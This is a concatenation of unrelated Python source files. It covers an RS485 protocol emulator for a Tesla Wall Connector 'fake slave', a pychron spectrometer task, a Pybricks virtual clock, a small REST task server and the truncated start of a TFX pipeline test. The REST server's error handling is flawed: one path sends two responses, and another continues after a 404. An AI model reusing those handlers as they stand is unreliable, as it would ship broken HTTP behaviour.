foundMsgMatch == False: # Handle linkready1 from master. # See notes in send_master_linkready1() for details. 
foundMsgMatch = True senderID = msgMatch.group(1) sign = msgMatch.group(2) master.setMasterTWCID(senderID) # This message seems to always contain seven 00 bytes in its # data area. If we ever get this message with non-00 data # we'll print it as an unexpected message. debugLog( 1, "Master TWC %02X%02X Linkready1. Sign: %s" % (senderID[0], senderID[1], hex_str(sign)), ) if senderID == fakeTWCID: master.master_id_conflict() # Other than picking a new fakeTWCID if ours conflicts with # master, it doesn't seem that a real slave will make any # sort of direct response when sent a master's linkready1 or # linkready2. else: msgMatch = re.search( b"\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z", msg, re.DOTALL, ) if msgMatch and foundMsgMatch == False: # Handle linkready2 from master. # See notes in send_master_linkready2() for details. foundMsgMatch = True senderID = msgMatch.group(1) sign = msgMatch.group(2) master.setMasterTWCID(senderID) # This message seems to always contain seven 00 bytes in its # data area. If we ever get this message with non-00 data # we'll print it as an unexpected message. debugLog( 1, "Master TWC %02X%02X Linkready2. Sign: %s" % (senderID[0], senderID[1], hex_str(sign)), ) if senderID == fakeTWCID: master.master_id_conflict() else: msgMatch = re.search( b"\A\xfb\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle heartbeat message from Master. foundMsgMatch = True senderID = msgMatch.group(1) receiverID = msgMatch.group(2) heartbeatData = msgMatch.group(3) master.setMasterTWCID(senderID) try: slaveTWC = master.slaveTWCs[receiverID] except KeyError: slaveTWC = master.newSlave(receiverID, 80) slaveTWC.masterHeartbeatData = heartbeatData if receiverID != fakeTWCID: # This message was intended for another slave. # Ignore it. debugLog( 11, "Master %02X%02X sent " "heartbeat message %s to receiver %02X%02X " "that isn't our fake slave." % ( senderID[0], senderID[1], hex_str(heartbeatData), receiverID[0], receiverID[1], ), ) continue amps = ( master.slaveHeartbeatData[1] << 8 ) + master.slaveHeartbeatData[2] master.addkWhDelivered( (master.convertAmpsToWatts(amps / 100) / 1000 / 60 / 60) * (now - timeLastkWhDelivered) ) timeLastkWhDelivered = now if time.time() - timeLastkWhSaved >= 300.0: timeLastkWhSaved = now debugLog( 9, "Fake slave has delivered %.3fkWh" % (master.getkWhDelivered()), ) # Save settings to file master.queue_background_task({"cmd": "saveSettings"}) if heartbeatData[0] == 0x07: # Lower amps in use (not amps allowed) by 2 for 10 # seconds. Set state to 07. master.slaveHeartbeatData[0] = heartbeatData[0] timeToRaise2A = now + 10 amps -= 280 master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF master.slaveHeartbeatData[4] = amps & 0xFF elif heartbeatData[0] == 0x06: # Raise amp setpoint by 2 permanently and reply with # state 06. After 44 seconds, report state 0A. timeTo0Aafter06 = now + 44 master.slaveHeartbeatData[0] = heartbeatData[0] amps += 200 master.slaveHeartbeatData[1] = (amps >> 8) & 0xFF master.slaveHeartbeatData[2] = amps & 0xFF amps -= 80 master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF master.slaveHeartbeatData[4] = amps & 0xFF elif ( heartbeatData[0] == 0x05 or heartbeatData[0] == 0x08 or heartbeatData[0] == 0x09 ): if ((heartbeatData[1] << 8) + heartbeatData[2]) > 0: # A real slave mimics master's status bytes [1]-[2] # representing max charger power even if the master # sends it a crazy value. 
master.slaveHeartbeatData[1] = heartbeatData[1] master.slaveHeartbeatData[2] = heartbeatData[2] ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2] ampsUsed -= 80 master.slaveHeartbeatData[3] = (ampsUsed >> 8) & 0xFF master.slaveHeartbeatData[4] = ampsUsed & 0xFF elif heartbeatData[0] == 0: if timeTo0Aafter06 > 0 and timeTo0Aafter06 < now: timeTo0Aafter06 = 0 master.slaveHeartbeatData[0] = 0x0A elif timeToRaise2A > 0 and timeToRaise2A < now: # Real slave raises amps used by 2 exactly 10 # seconds after being sent into state 07. It raises # a bit slowly and sets its state to 0A 13 seconds # after state 07. We aren't exactly emulating that # timing here but hopefully close enough. timeToRaise2A = 0 amps -= 80 master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF master.slaveHeartbeatData[4] = amps & 0xFF master.slaveHeartbeatData[0] = 0x0A elif heartbeatData[0] == 0x02: debugLog( 1, "Master heartbeat contains error %ld: %s" % (heartbeatData[1], hex_str(heartbeatData)), ) else: debugLog(1, "UNKNOWN MHB state %s" % (hex_str(heartbeatData))) # Slaves always respond to master's heartbeat by sending # theirs back. slaveTWC.send_slave_heartbeat(senderID) slaveTWC.print_status(master.slaveHeartbeatData) else: msgMatch = re.search( b"\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z", msg, re.DOTALL, ) if msgMatch and foundMsgMatch == False: # Handle 2-hour idle message # # This message is sent from a Master TWC three times in a # row every 2 hours: # c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0 # # I'd say this is used to indicate the master is still # alive, but it doesn't contain the Master's TWCID or any other # data so I don't see what any receiving TWC can do with it. # # I suspect this message is only sent when the master # doesn't see any other TWCs on the network, so I don't # bother to have our fake master send these messages being # as there's no point in playing a fake master with no # slaves around. foundMsgMatch = True debugLog(1, "Received 2-hour idle message from Master.") else: msgMatch = re.search( b"\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL, ) if msgMatch and foundMsgMatch == False: # Handle linkready message from slave on network that # presumably isn't us. foundMsgMatch = True senderID = msgMatch.group(1) sign = msgMatch.group(2) maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100 debugLog( 1, "%.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % (maxAmps, senderID[0], senderID[1], hex_str(sign)), ) if senderID == fakeTWCID: debugLog( 1, "ERROR: Received slave heartbeat message from " "slave %02X%02X that has the same TWCID as our fake slave." % (senderID[0], senderID[1]), ) continue master.newSlave(senderID, maxAmps) else: msgMatch = re.search( b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle heartbeat message from slave on network that # presumably isn't us. foundMsgMatch = True senderID = msgMatch.group(1) receiverID = msgMatch.group(2) heartbeatData = msgMatch.group(3) if senderID == fakeTWCID: debugLog( 1, "ERROR: Received slave heartbeat message from " "slave %02X%02X that has the same TWCID as our fake slave." % (senderID[0], senderID[1]), ) continue try: slaveTWC = master.slaveTWCs[senderID] except KeyError: # Slave is unlikely to send another linkready since it's # already linked with a real Master TWC, so just assume # it's 80A. 
slaveTWC = master.newSlave(senderID, 80) slaveTWC.print_status(heartbeatData) else: msgMatch = re.search( b"\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z", msg, re.DOTALL, ) if msgMatch and foundMsgMatch == False: # Handle voltage request message. This is only supported in # Protocol 2 so we always reply with a 16-byte message. foundMsgMatch = True senderID = msgMatch.group(1) receiverID = msgMatch.group(2) if senderID == fakeTWCID: debugLog( 1, "ERROR: Received voltage request message from " "TWC %02X%02X that has the same TWCID as our fake slave." % (senderID[0], senderID[1]), ) continue debugLog( 8, "VRQ from %02X%02X to %02X%02X" % (senderID[0], senderID[1], receiverID[0], receiverID[1]), ) if receiverID == fakeTWCID: kWhCounter = int(master.getkWhDelivered()) kWhPacked = bytearray( [ ((kWhCounter >> 24) & 0xFF), ((kWhCounter >> 16) & 0xFF), ((kWhCounter >> 8) & 0xFF), (kWhCounter & 0xFF), ] ) debugLog( 1, "VRS %02X%02X: %dkWh (%s) %dV %dV %dV" % ( fakeTWCID[0], fakeTWCID[1], kWhCounter, hex_str(kWhPacked), 240, 0, 0, ), ) master.getModuleByName("RS485").send( bytearray(b"\xFD\xEB") + fakeTWCID + kWhPacked + bytearray(b"\x00\xF0\x00\x00\x00\x00\x00") ) else: msgMatch = re.search( b"\A\xfd\xeb(..)(.........+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle voltage response message. # Example US value: # FD EB 7777 00000014 00F6 0000 0000 00 # EU value (3 phase power): # FD EB 7777 00000038 00E6 00F1 00E8 00 foundMsgMatch = True senderID = msgMatch.group(1) data = msgMatch.group(2) kWhCounter = ( (data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3] ) voltsPhaseA = (data[4] << 8) + data[5] voltsPhaseB = (data[6] << 8) + data[7] voltsPhaseC = (data[8] << 8) + data[9] # Update this detail for the Slave TWC master.updateSlaveLifetime( senderID, kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC ) if senderID == fakeTWCID: debugLog( 1, "ERROR: Received voltage response message from " "TWC %02X%02X that has the same TWCID as our fake slave." % (senderID[0], senderID[1]), ) continue debugLog( 1, "VRS %02X%02X: %dkWh %dV %dV %dV" % ( senderID[0], senderID[1], kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC, ), ) if foundMsgMatch == False: debugLog(1, "***UNKNOWN MESSAGE from master: " + hex_str(msg)) except KeyboardInterrupt: debugLog(1, "Exiting after background tasks complete...") break except Exception as e: # Print info about unhandled exceptions, then continue. Search for # 'Traceback' to find these in the log. traceback.print_exc() debugLog(1, "Unhandled Exception:" + traceback.format_exc()) # Sleep 5 seconds so the user might see the error. time.sleep(5) # Make sure any volatile data is written to disk before exiting master.queue_background_task({"cmd": "saveSettings"}) # Wait for background tasks thread to finish all tasks. # Note that there is no such thing as backgroundTasksThread.stop(). Because we # set the thread type to daemon, it will be automatically killed when we exit # this program. master.backgroundTasksQueue.join() # Close the input module master.getModuleByName("RS485").close() # # End main program # ##############################
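# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original program): the voltage response
# message handled above (FD EB) carries a 32-bit lifetime kWh counter followed
# by three 16-bit per-phase voltages, all big-endian.  The helpers below mirror
# that packing and parsing on plain byte strings; the function names and the
# sample values in the comments are invented for the example.
# ---------------------------------------------------------------------------
def pack_voltage_response_payload(kWh, voltsPhaseA, voltsPhaseB, voltsPhaseC):
    # Mirrors the bytearray built for our fake slave's FD EB reply above.
    payload = bytearray(
        [
            (kWh >> 24) & 0xFF,
            (kWh >> 16) & 0xFF,
            (kWh >> 8) & 0xFF,
            kWh & 0xFF,
        ]
    )
    for volts in (voltsPhaseA, voltsPhaseB, voltsPhaseC):
        payload.extend([(volts >> 8) & 0xFF, volts & 0xFF])
    return payload


def unpack_voltage_response_payload(data):
    # Mirrors the FD EB parsing above: bytes 0-3 are kWh, 4-5/6-7/8-9 volts.
    kWh = (data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3]
    voltsPhaseA = (data[4] << 8) + data[5]
    voltsPhaseB = (data[6] << 8) + data[7]
    voltsPhaseC = (data[8] << 8) + data[9]
    return kWh, voltsPhaseA, voltsPhaseB, voltsPhaseC

# Example (EU, three-phase supply):
#   unpack_voltage_response_payload(
#       pack_voltage_response_payload(56, 230, 241, 232)) == (56, 230, 241, 232)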
spectrometer_task.py
# =============================================================================== # Copyright 2013 Jake Ross # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =============================================================================== # ============= enthought library imports ======================= from __future__ import absolute_import import time # ============= standard library imports ======================== from threading import Thread from pyface.tasks.action.schema import SToolBar from pyface.tasks.task_layout import TaskLayout, PaneItem, Splitter, VSplitter from pyface.ui.qt4.tasks.advanced_editor_area_pane import EditorWidget from traits.api import Any, Instance, on_trait_change # ============= local library imports ========================== from pychron.core.ui.gui import invoke_in_main_thread from pychron.envisage.tasks.editor_task import EditorTask from pychron.spectrometer.tasks.editor import PeakCenterEditor, ScanEditor, CoincidenceEditor, ScannerEditor from pychron.spectrometer.tasks.spectrometer_actions import StopScanAction from pychron.spectrometer.tasks.spectrometer_panes import ControlsPane, \ ReadoutPane, IntensitiesPane, RecordControlsPane, DACScannerPane, MassScannerPane class SpectrometerTask(EditorTask): scan_manager = Any name = 'Spectrometer' id = 'pychron.spectrometer' _scan_editor = Instance(ScanEditor) tool_bars = [SToolBar(StopScanAction(), )] def info(self, msg, *args, **kw): super(SpectrometerTask, self).info(msg) def spy_position_magnet(self, *args, **kw): self.scan_manager.position_magnet(*args, **kw) def spy_peak_center(self, name): peak_kw = dict(confirm_save=False, warn=True, new_thread=False, message='spectrometer script peakcenter', on_end=self._on_peak_center_end) setup_kw = dict(config_name=name) return self._peak_center(setup_kw=setup_kw, peak_kw=peak_kw) def populate_mftable(self): sm = self.scan_manager cfg = sm.setup_populate_mftable() if cfg: def func(): refiso = cfg.isotope ion = sm.ion_optics_manager ion.backup_mftable() odefl = [] dets = cfg.get_detectors() self.debug('setting deflections') for det, defl in dets: odefl.append((det, sm.spectrometer.get_deflection(det))) sm.spectrometer.set_deflection(det, defl) for di in dets: ion.setup_peak_center(detector=[di.name], isotope=refiso, config_name=cfg.peak_center_config.active_item.name, standalone_graph=False, new=True, show_label=True, use_configuration_dac=False) ion.peak_center.update_others = False name = 'Pop MFTable {}-{}'.format(di.name, refiso) invoke_in_main_thread(self._open_editor, PeakCenterEditor(model=ion.peak_center, name=name)) self._on_peak_center_start() ion.do_peak_center(new_thread=False, save=True, warn=True) self._on_peak_center_end() if not ion.peak_center.isAlive(): break self.debug('unset deflections') for det, defl in odefl: sm.spectrometer.set_deflection(det, defl) fp = cfg.get_finish_position() self.debug('move to end position={}'.format(fp)) if fp: iso, det = fp if iso and det: ion.position(iso, det) t = Thread(target=func) t.start() def stop_scan(self): self.debug('stop 
scan fired') editor = self.active_editor self.debug('active editor {}'.format(editor)) if editor: if isinstance(editor, (ScanEditor, PeakCenterEditor, CoincidenceEditor)): self.debug('editor stop') editor.stop() def do_coincidence(self): es = [int(e.name.split(' ')[-1]) for e in self.editor_area.editors if isinstance(e, CoincidenceEditor)] i = max(es) + 1 if es else 1 man = self.scan_manager.ion_optics_manager name = 'Coincidence {:02d}'.format(i) if man.setup_coincidence(): self._open_editor(CoincidenceEditor(model=man.coincidence, name=name)) man.do_coincidence_scan() def do_peak_center(self): peak_kw = dict(confirm_save=True, warn=True, message='manual peakcenter', on_end=self._on_peak_center_end) self._peak_center(peak_kw=peak_kw) def define_peak_center(self): from pychron.spectrometer.ion_optics.define_peak_center_view import DefinePeakCenterView man = self.scan_manager.ion_optics_manager spec = man.spectrometer dets = spec.detector_names isos = spec.isotopes dpc = DefinePeakCenterView(detectors=dets, isotopes=isos, detector=dets[0], isotope=isos[0]) info = dpc.edit_traits() if info.result: det = dpc.detector isotope = dpc.isotope dac = dpc.dac self.debug('manually setting mftable to {}:{}:{}'.format(det, isotope, dac)) message = 'manually define peak center {}:{}:{}'.format(det, isotope, dac) man.spectrometer.magnet.update_field_table(det, isotope, dac, message) def _on_peak_center_start(self): self.scan_manager.log_events_enabled = False self.scan_manager.scan_enabled = False def _on_peak_center_end(self): self.scan_manager.log_events_enabled = True self.scan_manager.scan_enabled = True def send_configuration(self): self.scan_manager.spectrometer.send_configuration() def prepare_destroy(self): for e in self.editor_area.editors: if hasattr(e, 'stop'): e.stop() self.scan_manager.prepare_destroy() super(SpectrometerTask, self).prepare_destroy() # def activated(self): # self.scan_manager.activate() # self._scan_factory() # super(SpectrometerTask, self).activated() def create_dock_panes(self): panes = [ ControlsPane(model=self.scan_manager), RecordControlsPane(model=self.scan_manager), MassScannerPane(model=self.scan_manager), DACScannerPane(model=self.scan_manager), ReadoutPane(model=self.scan_manager), IntensitiesPane(model=self.scan_manager)] panes = self._add_canvas_pane(panes) return panes # def _active_editor_changed(self, new): # if not new: # try: # self._scan_factory() # except AttributeError: # pass # private def _peak_center(self, setup_kw=None, peak_kw=None): if setup_kw is None: setup_kw = {} if peak_kw is None: peak_kw = {} es = [] for e in self.editor_area.editors: if isinstance(e, PeakCenterEditor): try: es.append(int(e.name.split(' ')[-1])) except ValueError: pass i = max(es) + 1 if es else 1 ret = -1 ion = self.scan_manager.ion_optics_manager self._peak_center_start_hook() time.sleep(2) name = 'Peak Center {:02d}'.format(i) if ion.setup_peak_center(new=True, **setup_kw): self._on_peak_center_start() invoke_in_main_thread(self._open_editor, PeakCenterEditor(model=ion.peak_center, name=name)) ion.do_peak_center(**peak_kw) ret = ion.peak_center_result self._peak_center_stop_hook() return ret def _peak_center_start_hook(self): pass def _peak_center_stop_hook(self): pass def _scan_factory(self): sim = self.scan_manager.spectrometer.simulation name = 'Scan (Simulation)' if sim else 'Scan' # self._open_editor(ScanEditor(model=self.scan_manager, name=name)) # print 'asdfas', self.editor_area.control # print [e for e in self.editor_area.control.children() if isinstance(e, 
EditorWidget)] # super(SpectrometerTask, self).activated() se = ScanEditor(model=self.scan_manager, name=name) self._open_editor(se) def _default_layout_default(self): return TaskLayout( left=Splitter( PaneItem('pychron.spectrometer.controls'), orientation='vertical'), right=VSplitter(PaneItem('pychron.spectrometer.intensities'), PaneItem('pychron.spectrometer.readout'))) # def create_central_pane(self): # g = ScanPane(model=self.scan_manager) # return g @on_trait_change('scan_manager:mass_scanner:new_scanner') def _handle_mass_scan_event(self): self._scan_event(self.scan_manager.mass_scanner) @on_trait_change('scan_manager:dac_scanner:new_scanner') def _handle_dac_scan_event(self): self._scan_event(self.scan_manager.dac_scanner) def _scan_event(self, scanner): sim = self.scan_manager.spectrometer.simulation name = 'Magnet Scan (Simulation)' if sim else 'Magnet Scan' editor = next((e for e in self.editor_area.editors if e.id == 'pychron.scanner'), None) if editor is not None: scanner.reset() else: editor = ScannerEditor(model=scanner, name=name, id='pychron.scanner') self._open_editor(editor, activate=False) self.split_editors(0, 1, h2=300, orientation='vertical') self.activate_editor(editor) @on_trait_change('window:opened') def _opened(self): self.scan_manager.activate() self._scan_factory() ee = [e for e in self.editor_area.control.children() if isinstance(e, EditorWidget)][0] # print int(ee.features()) # ee.setFeatures(QtGui.QDockWidget.NoDockWidgetFeatures) # print int(ee.features()) # ee.update_title() # ============= EOF =============================================
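# ---------------------------------------------------------------------------
# Illustrative sketch (not part of pychron): do_coincidence() and
# _peak_center() above both pick the next editor number by parsing the
# trailing integer out of the existing editor names ("Coincidence 01",
# "Peak Center 02", ...).  The standalone helper below shows that numbering
# rule on plain strings; the example names are invented.
# ---------------------------------------------------------------------------
def _next_editor_index(names):
    es = []
    for name in names:
        try:
            es.append(int(name.split(' ')[-1]))
        except ValueError:
            pass
    return max(es) + 1 if es else 1

# _next_editor_index(['Peak Center 01', 'Peak Center 03']) -> 4
# _next_editor_index([]) -> 1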
clock.py
# SPDX-License-Identifier: MIT # Copyright (c) 2022 The Pybricks Authors import random import signal import threading import time class VirtualClock: nanoseconds: int = 0 """ The current clock time in nanoseconds. This value is read when ``pbdrv_clock_get_ms()`` or ``pbdrv_clock_get_us`` is called. """ _thread_id: int _signum: int def interrupt(self): """ Fires the clock "interrupt". This must not be called before :meth:`on_init`. """ signal.pthread_kill(self._thread_id, self._signum) def on_init(self, thread_id: int, signum: int): """ Called when ``pbdrv_clock_init()`` is called. Args: thread_id: The id of the thread to be interrupted. signum: The signal number to use when interrupting. """ self._thread_id = thread_id self._signum = signum @property def microseconds(self) -> int: """ The current clock time in microseconds. """ return self.nanoseconds // 1000 class WallClock(VirtualClock): """ Implementation of the virtual clock that uses the computer's own clock. """ @property def nanoseconds(self) -> int: return time.monotonic_ns() def on_init(self, thread_id: int, signum: int): super().on_init(thread_id, signum) threading.Thread(target=self.run, daemon=True).start() def run(self): # Provide the required 1 millisecond tick in "real" time. In reality, # this won't be accurate since desktop OSes are not realtime systems. while True: time.sleep(0.001) self.interrupt() class CountingClock(VirtualClock): """ Clock implementation that increases the current time by *step* microseconds each time :meth:`tick` is called. To create a clock that runs as fast as possible use the class like this:: class Platform(VirtualPlatform): def __init__(self): super().__init__() ... self.clock[-1] = CountingClock() self.subscribe_poll(self.clock[-1].tick) ... """ def __init__( self, start: int = (2**32 - 3) * 1000, step: int = 1000, fuzz: int = 100 ) -> None: """ Args: start: The starting time in microseconds. The default value is chosen so that the 32-bit millisecond clock and the 32-bit microsecond clock will both roll over in two virtual seconds. This is done to help expose code that may not be computing time differences correctly. step: The number of microseconds to increase the clock time by on each :meth:`tick`. The default value advances the virtual clock by 1 millisecond on each tick. fuzz: The amount of random variation to apply to *step* at each tick. This is done to help expose code that may not correctly handle small variations in timestamps. Setting to 0 will disable fuzzing. """ super().__init__() # convert microseconds to nanoseconds self.nanoseconds = start * 1000 self._step_ns = step * 1000 self._fuzz_ns = fuzz * 1000 def tick(self, *args): """ Increases the clock time by *step* +/- *fuzz* and triggers the clock interupt. This method has unused *args so that it can be passed directly to the :class:`VirtualPlatform` poll subscribe method. """ if self._fuzz_ns: self.nanoseconds += random.randint( self._step_ns - self._fuzz_ns, self._step_ns + self._fuzz_ns ) else: self.nanoseconds += self._step_ns self.interrupt()
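# ---------------------------------------------------------------------------
# Usage sketch (not part of the module above): drive a CountingClock by hand.
# The clock interrupt is delivered with pthread_kill, so a do-nothing handler
# for SIGUSR1 is registered on the current (main) thread first -- on a real
# platform pbdrv_clock_init() would supply the thread id and signal number.
# POSIX-only; the start/step values are arbitrary example numbers.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    clock = CountingClock(start=0, step=1000, fuzz=0)

    signal.signal(signal.SIGUSR1, lambda signum, frame: None)
    clock.on_init(threading.get_ident(), signal.SIGUSR1)

    for _ in range(5):
        clock.tick()

    # Five ticks of 1000 microseconds each.
    assert clock.microseconds == 5000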
app.py
import json import re import threading import time import logging from argparse import ArgumentParser from collections import deque from http import HTTPStatus from http.server import HTTPServer, BaseHTTPRequestHandler logging.basicConfig(level=logging.INFO) logger = logging.getLogger(__name__) ADDRESS = '0.0.0.0' PORT = 8000 API_VERSION = '1.0' API_URL = f'/api/v{API_VERSION}/tasks' TASKS_POLL_PERIOD_S = 0.1 run_thread = True cond_new_task = threading.Condition() tasks_queue = deque() class TaskStatus: queued = 'queued' running = 'running' done = 'done' error = 'error' class TaskType: reverse = 'reverse' reverse_time = 3 mix_even = 'mix_even' mix_even_time = 7 tasks = [ { 'id': 1, 'payload': 'sample task', 'type': 'reverse', 'status': 'done', 'result': 'sample task', }, ] class RestJsonHTTPRequestHandler(BaseHTTPRequestHandler): task_status_pattern = re.compile('/([0-9]+)/status[/]?') task_result_pattern = re.compile('/([0-9]+)/result[/]?') def get_tasks_list(self): self._send_json_data({'tasks': tasks}) def get_task_status(self, task_id_match): task = self._get_task(task_id_match) if not task: return self._send_json_data( {'task': {'id': task['id'], 'status': task['status']}}) def get_task_result(self, task_id_match): task = self._get_task(task_id_match) if not task: return if task['result'] is None: self._abort_not_found() self._send_json_data( {'task': {'id': task['id'], 'result': task['result']}}) def post_task(self): data_string = self.rfile.read( int(self.headers['Content-Length'])).decode() data = json.loads(data_string) try: task = { 'id': tasks[-1]['id'] + 1, 'payload': data['payload'], 'type': data['type'], 'status': TaskStatus.queued, 'result': None, } except KeyError: self._abort_bad_request() return tasks.append(task) tasks_queue.appendleft(task) with cond_new_task: cond_new_task.notify_all() self._send_json_data({'task': task}, status=HTTPStatus.CREATED) def do_GET(self): if not self.path.startswith(API_URL): self._abort_not_found() return sub_path = self.path.replace(API_URL, '', 1) if sub_path == '' or sub_path == '/': self.get_tasks_list() return task_id_status = self.task_status_pattern.search(sub_path) if task_id_status: self.get_task_status(task_id_status) return task_id_result = self.task_result_pattern.search(sub_path) if task_id_result: self.get_task_result(task_id_result) return self._abort_not_found() def do_POST(self): self.post_task() def _get_task(self, task_id_match): task_id = int(task_id_match.group(1)) task = list(filter(lambda t: t['id'] == task_id, tasks)) if len(task) == 0: self._abort_not_found() return None return task[0] def _send_end_response(self, code): self.send_response(code) self.send_header('Content-Type', 'application/json') self.end_headers() def _abort_not_found(self): self._send_json_data({'error': 'Not found'}, HTTPStatus.NOT_FOUND) def _abort_bad_request(self): self._send_end_response(HTTPStatus.BAD_REQUEST) self._send_json_data({'error': 'Bad request'}, HTTPStatus.NOT_FOUND) def _send_json_data(self, data, status=HTTPStatus.OK): self._send_end_response(status) self.wfile.write(json.dumps(data).encode()) def handle_tasks(): processor = TasksProcessor(TASKS_POLL_PERIOD_S) while run_thread: while run_thread: processor.process_queue() class TasksProcessor: def __init__(self, poll_time_s): self.poll_time_s = poll_time_s def process_queue(self): with cond_new_task: cond_new_task.wait(self.poll_time_s) if not tasks_queue: return task = tasks_queue.pop() self.process_task(task) def process_task(self, task): task['status'] = TaskStatus.running 
logging.info(f'Processing task {task["id"]}') if task['type'] == TaskType.reverse: time.sleep(TaskType.reverse_time) task['result'] = self.reverse_string(task['payload']) elif task['type'] == TaskType.mix_even: time.sleep(TaskType.mix_even_time) task['result'] = self.mix_even((task['payload'])) else: task['status'] = TaskStatus.error return task['status'] = TaskStatus.done logging.info(f'Task {task["id"]} processed') def reverse_string(self, data): return data[::-1] def mix_even(self, data): mixed = [] i = 0 while i < len(data): if i == len(data) - 1: mixed.append(data[i]) break mixed.append(data[i + 1]) mixed.append(data[i]) i += 2 return ''.join(mixed) class App: def __init__(self, addr, port): self.address = addr self.port = port def run(self): t = self.start_thread() self.run_server() self.stop_thread(t) def start_thread(self): t = threading.Thread(target=handle_tasks) t.daemon = True t.start() logger.info('Task queue started') return t def stop_thread(self, t): global run_thread run_thread = False with cond_new_task: cond_new_task.notify_all() t.join() logger.info('Task queue stopped') def run_server(self): httpd = HTTPServer((self.address, self.port), RestJsonHTTPRequestHandler) try: logger.info('Server started') httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() logger.info('Server stopped') if __name__ == '__main__': parser = ArgumentParser('HTTP REST-JSON API server') parser.add_argument('ip', default=ADDRESS, nargs='?', help='ip of server') parser.add_argument('port', default=PORT, type=int, nargs='?', help='port of server') args = parser.parse_args() app = App(args.ip, args.port) app.run()
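# ---------------------------------------------------------------------------
# Client sketch (not used by the server): queue one 'reverse' task through the
# REST API with only the standard library and wait for its result.  It assumes
# the server above is already running on localhost:8000; the payload text is
# just an example.
# ---------------------------------------------------------------------------
def example_client(base_url=f'http://localhost:{PORT}{API_URL}'):
    from urllib.request import Request, urlopen

    body = json.dumps({'payload': 'hello world', 'type': TaskType.reverse}).encode()
    request = Request(base_url, data=body,
                      headers={'Content-Type': 'application/json'})
    task = json.load(urlopen(request))['task']

    # Poll the status endpoint until the worker thread finishes the task.
    while True:
        status = json.load(
            urlopen(f'{base_url}/{task["id"]}/status'))['task']['status']
        if status in (TaskStatus.done, TaskStatus.error):
            break
        time.sleep(1)

    if status != TaskStatus.done:
        return None
    return json.load(
        urlopen(f'{base_url}/{task["id"]}/result'))['task']['result']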
pipeline_ops_test.py
# Copyright 2020 Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for tfx.orchestration.experimental.core.pipeline_ops.""" import copy import os import threading import time from absl.testing.absltest import mock import tensorflow as tf from tfx.orchestration import metadata from tfx.orchestration.experimental.core import async_pipeline_task_gen from tfx.orchestration.experimental.core import pipeline_ops from tfx.orchestration.experimental.core import status as status_lib from tfx.orchestration.experimental.core import sync_pipeline_task_gen from tfx.orchestration.experimental.core import task as task_lib from tfx.orchestration.experimental.core import task_gen_utils from tfx.orchestration.experimental.core import task_queue as tq from tfx.orchestration.experimental.core import test_utils from tfx.orchestration.portable.mlmd import execution_lib from tfx.proto.orchestration import pipeline_pb2 from tfx.utils import test_case_utils as tu from ml_metadata.proto import metadata_store_pb2 def _test_pipeline(pipeline_id, execution_mode: pipeline_pb2.Pipeline.ExecutionMode = ( pipeline_pb2.Pipeline.ASYNC)): pipeline = pipeline_pb2.Pipeline() pipeline.pipeline_info.id = pipeline_id pipeline.execution_mode = execution_mode return pipeline class PipelineOpsTest(tu.TfxTest): def setUp(self): super(PipelineOpsTest, self).setUp() pipeline_root = os.path.join( os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()), self.id()) # Makes sure multiple connections within a test always connect to the same # MLMD instance. metadata_path = os.path.join(pipeline_root, 'metadata', 'metadata.db') self._metadata_path = metadata_path connection_config = metadata.sqlite_metadata_connection_config( metadata_path) connection_config.sqlite.SetInParent() self._mlmd_connection = metadata.Metadata( connection_config=connection_config) def test_initiate_pipeline_start(self): with self._mlmd_connection as m: # Initiate a pipeline start. pipeline1 = _test_pipeline('pipeline1') pipeline_state1 = pipeline_ops.initiate_pipeline_start(m, pipeline1) self.assertEqual(pipeline1, pipeline_state1.pipeline) self.assertEqual(metadata_store_pb2.Execution.NEW, pipeline_state1.execution.last_known_state) # Initiate another pipeline start. pipeline2 = _test_pipeline('pipeline2') pipeline_state2 = pipeline_ops.initiate_pipeline_start(m, pipeline2) self.assertEqual(pipeline2, pipeline_state2.pipeline) self.assertEqual(metadata_store_pb2.Execution.NEW, pipeline_state2.execution.last_known_state) # Error if attempted to initiate when old one is active. with self.assertRaises(status_lib.StatusNotOkError) as exception_context: pipeline_ops.initiate_pipeline_start(m, pipeline1) self.assertEqual(status_lib.Code.ALREADY_EXISTS, exception_context.exception.code) # Fine to initiate after the previous one is inactive. 
